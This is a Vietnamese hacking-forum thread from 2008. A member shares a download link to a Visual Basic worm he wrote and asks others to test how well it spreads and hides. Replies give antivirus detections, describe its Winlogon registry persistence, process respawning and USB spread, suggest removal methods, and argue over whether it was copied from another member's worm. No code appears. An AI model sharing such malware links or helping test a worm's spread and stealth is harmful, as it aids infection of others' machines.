test dùm em con virus - .:: HVAOnline ::.

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận virus, trojan, spyware, worm...

test dùm em con virus

[Question] test dùm em con virus	09/02/2008 11:20:19 (+0700) \| #1 \| 113973

Hackervn_cbg
Member

Joined: 06/12/2006 16:47:27
Messages: 8
Offline

các pác kiểm tra dùm em con virus này , nó ko có khả năng phá hoại nên các bác test thoải mái
bác nào test rồi cho em cái ý kiến nhé
Code:

http://files.myopera.com/onlylove_76/files/hbnew.zip

[Question] Re: test dùm em con virus	09/02/2008 12:36:42 (+0700) \| #2 \| 113984

thanhlam_IT
Member

Joined: 06/02/2008 14:54:53
Messages: 2
Offline

virus gì vậy chức năng của nó là gì hoạt động ra sao?

[Question] test dùm em con virus	09/02/2008 13:58:23 (+0700) \| #3 \| 114005

red_flag_communism
Member

Joined: 03/10/2007 16:46:44
Messages: 72
Offline

Hackervn_cbg wrote:

các pác kiểm tra dùm em con virus này , nó ko có khả năng phá hoại nên các bác test thoải mái
bác nào test rồi cho em cái ý kiến nhé
Code:
http://files.myopera.com/onlylove_76/files/hbnew.zip

Nghe PE virus nhiều rồi, giờ mới biết là như vậy, cũng hay gớm. smilie

[Question] Re: test dùm em con virus	11/02/2008 03:34:58 (+0700) \| #4 \| 114165

Hackervn_cbg
Member

Joined: 06/12/2006 16:47:27
Messages: 8
Offline

^^! nó không phải là PE đâu , em viết bằng Vb mừ

[Question] Re: test dùm em con virus	12/02/2008 20:43:28 (+0700) \| #5 \| 114329

mystery_hacker
Member

Joined: 30/06/2006 16:16:03
Messages: 365
Location: Khánh Hòa
Offline

Em ko hiểu test ở đây là như thế nào? Mọi người có thể giải thích thêm cho em được ko ạ?

[Question] test dùm em con virus	13/02/2008 03:50:10 (+0700) \| #6 \| 114386

lion_king_lovely_1985
Member

Joined: 05/09/2006 20:13:20
Messages: 156
Location: HTTP://HTVSITE.COM
Offline

Hackervn_cbg wrote:

các pác kiểm tra dùm em con virus này , nó ko có khả năng phá hoại nên các bác test thoải mái
bác nào test rồi cho em cái ý kiến nhé
Code:
http://files.myopera.com/onlylove_76/files/hbnew.zip

Virus -> Ko có khả năng phá hoại -> Căn cứ vào đâu bạn nói là ko có khả năng phá hoại -> Nếu ko có khả năng phá hoại -> Căn cứ vào đâu bạn gọi nó là Virus!?!

Đây thảo luận -> Bạn ko đưa ra câu hỏi, cũng ko đưa ra phân tích -> Thay vì việc đó bạn đưa lên 1 link khó đoán -> Ý bạn là gì? -> LKL ko hiểu!!!

Thân LKL!!!

HỌC THIẾT KẾ WEBSITE | HỌC LẬP TRÌNH WEBSITE | HỌC QUẢN TRỊ WEBSITE | HỌC LẬP TRÌNH PHP & MySQL
HTTP://HTVSITE.COM

[Question] Re: test dùm em con virus	14/02/2008 15:27:31 (+0700) \| #7 \| 114660

quanniitBMT
Member

Joined: 17/01/2007 01:36:44
Messages: 7
Offline

Mình đồng ý với LKL.

[Question] Re: test dùm em con virus	20/02/2008 05:19:00 (+0700) \| #8 \| 115557

hungtv2212
Member

Joined: 11/12/2006 14:56:12
Messages: 12
Offline

Chào!
Ý bạn nói test ở đây là gì vậy?????
-----------------------------------------

[Question] Re: test dùm em con virus	20/02/2008 11:19:16 (+0700) \| #9 \| 115610

red_flag_communism
Member

Joined: 03/10/2007 16:46:44
Messages: 72
Offline

Hackervn_cbg wrote:

^^! nó không phải là PE đâu , em viết bằng Vb mừ

Thấy NOD32 nó bảo là "new PE virus" (heuristics) nên em nói vậy. smilie

lion_king_lovely_1985 wrote:

Nếu ko có khả năng phá hoại -> Căn cứ vào đâu bạn gọi nó là Virus!?!

Virus đâu nhất thiết phải phá hoại đâu bác. smilie

[Question] Re: test dùm em con virus	20/02/2008 13:05:26 (+0700) \| #10 \| 115641

ngockhuepham
Member

Joined: 26/10/2007 23:54:33
Messages: 5
Offline

Con này NOD32 nó báo là WIN32/VB.NJO worm đó

[Question] Re: test dùm em con virus	20/02/2008 14:05:30 (+0700) \| #11 \| 115645

red_flag_communism
Member

Joined: 03/10/2007 16:46:44
Messages: 72
Offline

ngockhuepham wrote:

Con này NOD32 nó báo là WIN32/VB.NJO worm đó

Đúng rồi, hôm em down con đó về quét thử bằng NOD32 thì nó bảo là "new PE virus", sau đó gửi mẫu cho nó luôn nên giờ chắc nó cập nhật rồi.

[Question] Re: test dùm em con virus	20/02/2008 22:37:27 (+0700) \| #12 \| 115671

N3tFind3r
Member

Joined: 19/02/2008 19:13:32
Messages: 3
Offline

Vừa download về thì thấy cái này :

[Question] Re: test dùm em con virus	22/02/2008 11:50:11 (+0700) \| #13 \| 115993

Hackervn_cbg
Member

Joined: 06/12/2006 16:47:27
Messages: 8
Offline

1 , nó không phá hoại ==> do em viết , ko có ý phá hoại máy
2 , test thử => có nghĩa là test khả năng lây lan và ẩn mình của nó

[Question] Re: test dùm em con virus	22/02/2008 12:44:04 (+0700) \| #14 \| 115999

neo_mg
Member

Joined: 05/04/2007 22:55:11
Messages: 7
Offline

con này hay dữ cho minh cái mã nguồn được không nhế smilie

[Question] Re: test dùm em con virus	22/02/2008 13:18:02 (+0700) \| #15 \| 116011

maithangbs
Elite Member

Joined: 28/11/2007 21:39:53
Messages: 567
Location: Д.и.Р
Offline

N3tFind3r wrote:

Vừa download về thì thấy cái này :

Nó thông báo thế thì đâu phải bạn viết đâu hả

[Question] Re: test dùm em con virus	23/02/2008 02:04:06 (+0700) \| #16 \| 116123

hungtv2212
Member

Joined: 11/12/2006 14:56:12
Messages: 12
Offline

HI!
Sau khi test thử mình cũng thấy con virus này khá hay. Post để mọi người cho ý kiến.

Khi được kích hoạt thì con này sẽ tạo ra rất nhiều file *.exe trong thư mục Windows\system32\config và File winsit.exe trong thư mục Windows.

Nó thêm vào registry để kích hoạt lúc Windows khởi động.

Code:

Thêm giá trị C:\Windows\Winsit.exe vào khóa 
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
và thêm giá trị C:\Windows\system32\config\*.exe (một file bất kỳ mà nó tạo ra ở trên)
vào khóa HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

Khi nó chạy thì nó liên tục chạy nhân bản nó thành các tiến trình khác và tự tắt tiến trình ban đầu. Vì vậy đồng thời một lúc có nhiều tiến trình cùng chạy----> Không thể kill các process được vì nó chạy và tắt tiến trình rất nhanh.

Nhận Xét

Mình thấy việc tự nhân bản chính nó thành nhiều process và lập tức tắt bỏ process ban đầu tuy làm cho không thể tắt virus bình thường được (vì Task Mangager và ProcessXP không cho tắt đồng thời nhiều tiến trình một lúc, thời gian chạy và tắt của process là khá nhanh nên không thể tắt kịp). nhưng vì vậy nó lại làm lộ chính bản thân virus----->Tính hidden không có. Hơn nữa việc tạo ra quá nhiều file chạy trong thư mục Windows\system32\config cũng gây lộ virus.

Tuy nhiên, biết được virus là như vậy nhưng để xóa nó một cách thủ công cũng khá phức tạp. Ta không thể tắt được process của virus nên không thể diệt được nó trong Win. Để diệt nó ta có thể dùng 2 cách sau (Tôi mới nghĩ ra được 2 cách này thôi smilie

)
Code:

[b]Thứ nhất[/b]
Vào DOS xóa bỏ các file mà virus tạo ra sau đó vào trong Window sửa lại Registry. (Cách này tôi chưa thử)
[b]Thứ hai[/b]
Vào DOS sửa regedit để không cho virus kích hoạt lúc windows khởi động. Sau đó vào trong Window xóa bỏ các file do nó tạo ra. 
Để sửa Registry trong DOS ta có thể dùng chương trình Offlline NT password and Editor Registry trong đĩa Hiren Boot.

Còn về tính phá hoại của nó may là bác nói là không có!
Thực sự thì mình cũng chưa biết test tính phá hoại của nó như thế nào cho full. (Có nhưng phá hoại ngầm mà mình không biêt) Có bồ nào biêt share cho mình với. Thanks

[Question] Re: test dùm em con virus	23/02/2008 06:17:45 (+0700) \| #17 \| 116178

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

Bạn Hoà Bình nên dùng thời giờ nghiên cứu những vấn đề khác thiết thực hơn là tạo 2 process rồi gọi qua gọi lại làm gì.

PS:
1. Cái application này không được gọi là virus
2. Bạn nào có lỡ down về chạy lên rồi thì dùng cái này, update lên db mới rồi quét: http://fasthelper.fire-lion.com/

[Question] Re: test dùm em con virus	24/02/2008 05:33:09 (+0700) \| #18 \| 116328

dungcoi_vb
Member

Joined: 29/06/2006 17:17:06
Messages: 100
Offline

@HoaBinh : D : \ S e t u p \ s e t u p s w \ p h a n m e m \ d i e t v i r u s \ s o u r c e v i r u s \ W o r m \ S o u r c e R e a l W o r m \ h o a b i n h 1 . v b p

/ C N . e x e
C : \ W I N D O W S \ D a t a V . i n i
C : \ W I N D O W S \ r e p a i r . i n i

smilie

Bạn tự nghĩ đi nhé
Mình ko có bình luận gì thêm.

[Question] Re: test dùm em con virus	24/02/2008 08:22:13 (+0700) \| #19 \| 116347

Hackervn_cbg
Member

Joined: 06/12/2006 16:47:27
Messages: 8
Offline

dungcoi_vb bạn nghĩ là tui ăn cắp con realworm của bạn rồi post lên đây ? , bạn xem xem nó có giống con realworm của bạn không rồi hãy nói nhé !
mình quả thực đã down realworm của bạn về , rồi dùng luôn project tên đó để viết vì mình tận dụng phần ghí key vào registry &killapp của bạn mà thôi , một số phần mình chưa bỏ ( lười ) , nhưng ko hề sử dụng ( datav.ini , cn.exe ) , nếu bạn nghĩ mình hoàn toàn dùng con realworm của bạn , chỉ đổi tên mà thôi , thì mình có thể sẵn sàng đối chất với bạn , xem hbnew và realworm có phải là 1 ???

mình đã đi theo hướng khác để viết , nhưng sẵn sàng có một cuộc đối chứng về cái application nhỏ nhỏ này , nếu bạn rảnh
===Thân====

[Question] Re: test dùm em con virus	24/02/2008 10:28:19 (+0700) \| #20 \| 116352

lethiet
Member

Joined: 23/02/2008 15:46:45
Messages: 4
Offline

mình cũng test thử = kasperky nó báo Malicious HTTP object <http://files.myopera.com/onlylove_76/files/hbnew.zip/hb1.exe>: detected virus 'IM-Worm.Win32.VB.et'.

[Question] Re: test dùm em con virus	24/02/2008 12:36:03 (+0700) \| #21 \| 116384

LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline

Chuyện cả có gì, không cần phải làm lớn lên đâu bạn.

[Question] Re: test dùm em con virus	25/02/2008 03:28:34 (+0700) \| #22 \| 116464

dungcoi_vb
Member

Joined: 29/06/2006 17:17:06
Messages: 100
Offline

sorry anh Hoàng. Em thực sự ko muốn nói nhiều về mấy vụ này nữa nhưng thấy khó chịu nên em mạn phép anh post bài này.

1. Mình ko phủ nhận bạn đã sửa chữa lại source RealWorm nhưng mình dám khẳng định. Bạn đã viết worm này trên nền (Project) RealWorm
2. Trong cấu trúc project thực ra bạn đã giữ lại gần như toàn bộ (Toàn bộ Control, module, thậm chí cả ListBox mà mình sài bạn cùng giữ lại). Bạn chỉ thêm module Process1 và viết thêm vài hàm nhỏ (Nếu mình nhớ ko nhầm thì bạn viết docfile và xoafile)
3. Bạn đã thay đổi tên Control Download trở thành HoaBinhI. Xin nói thẳng với bạn. Dù mình rất kiêu ngạo nhưng mình cũng ko ... tới mức đổi tên cả một control hay module khi DC copy toàn bộ chúng (Nếu module đó DC copy từng đoạn ngắn, DC sẽ comment phần trên module)

4. Toàn bộ những gì mà realworm làm dc đều nằm ở :
a. các process rác (tự bảo vệ)
b. Ghi vài userinit
c. lây vào usb
=> Mình ko thể nghĩ khác nếu worm bạn có chúng mà trong khi cấu trúc code chỉ thêm chút ít ?

smilie

có cần nhắc lại nguyên tắc cuối cùng trong bản giới thiệu đi cùng realworm ko nhỉ. Cấm compile (Bạn có thay đổi hết đi nữa, thì vẫn vậy, mình chỉ share 1 source, còn bạn đã làm gì ? Share 1 worm) smilie

[Question] Re: test dùm em con virus	25/02/2008 03:51:42 (+0700) \| #23 \| 116473

danvac
Member

Joined: 15/03/2007 18:53:59
Messages: 71
Offline

con này có kích thước 56 kb
real worm 60 kb
cách tự vệ giống nhau
ngôn ngữ lập trình giống nhau
icon khác nhau
con này là realworm nhưng có sửa chữa khá nhiều
ok

[Question] Re: test dùm em con virus	25/02/2008 22:28:47 (+0700) \| #24 \| 116561

VXer
Member

Joined: 20/12/2007 10:22:40
Messages: 44
Offline

Hackervn_cbg wrote:

dungcoi_vb bạn nghĩ là tui ăn cắp con realworm của bạn rồi post lên đây ? , bạn xem xem nó có giống con realworm của bạn không rồi hãy nói nhé !
mình quả thực đã down realworm của bạn về , rồi dùng luôn project tên đó để viết vì mình tận dụng phần ghí key vào registry &killapp của bạn mà thôi , một số phần mình chưa bỏ ( lười ) , nhưng ko hề sử dụng ( datav.ini , cn.exe ) , nếu bạn nghĩ mình hoàn toàn dùng con realworm của bạn , chỉ đổi tên mà thôi , thì mình có thể sẵn sàng đối chất với bạn , xem hbnew và realworm có phải là 1 ???

mình đã đi theo hướng khác để viết , nhưng sẵn sàng có một cuộc đối chứng về cái application nhỏ nhỏ này , nếu bạn rảnh
===Thân====

SkIdie vs SkiDie smilie

[Question] Re: test dùm em con virus	26/02/2008 10:51:24 (+0700) \| #25 \| 116666

Hackervn_cbg
Member

Joined: 06/12/2006 16:47:27
Messages: 8
Offline

được mình xin nói cho bạn biết như sau :
mình viết luôn code của mình trên source cũ của bạn ( realwworm ) , đổi tên thành hoabinh1 , nhưng xin bạn nhớ cho
mình không hề sử dụng bất cứ 1 thứ gì ( trừ phần ghi vào regedit ) , dù các module của bạn vẫn còn , nhưng nó không hề được sử dụng . khi bạn debug có lẽ thấy 2 hàm docxoa & taofile 2 hàm cũng được viết ra nhằm mục đích khác , nhưng cuối cùng nó ko dc sử dụng ( mình ko xóa 2 hàm này đi ) ngay điều này mà khi debug bạn cũng ko biết thì thật khó nói chuyện .
bạn nói realworm của ban có các đặc trưng :
- tự bảo vệ
- ghi vào userinit
- lây vào usb

nói mong bạn đừng buồn , bất cứ ai test thử hb1 đều thấy rõ cách bảo vệ của hb1 & realworm là hoàn toàn khác nhau
( realworm có thể kill = 1 tệp .bat là xong )
- ghi vào userinit : cái này mình lấy từ realworm của bạn
- lây vào usb ==> ko phải là đặc trưng của realworm , code này ai chả biết , bạn tự nhận nó là đặc trưng của realworm ==> smilie

bạn nào đã test thử hb1 mong có nhận xét , so sánh với realworm

Go to:

Users currently in here
1 Anonymous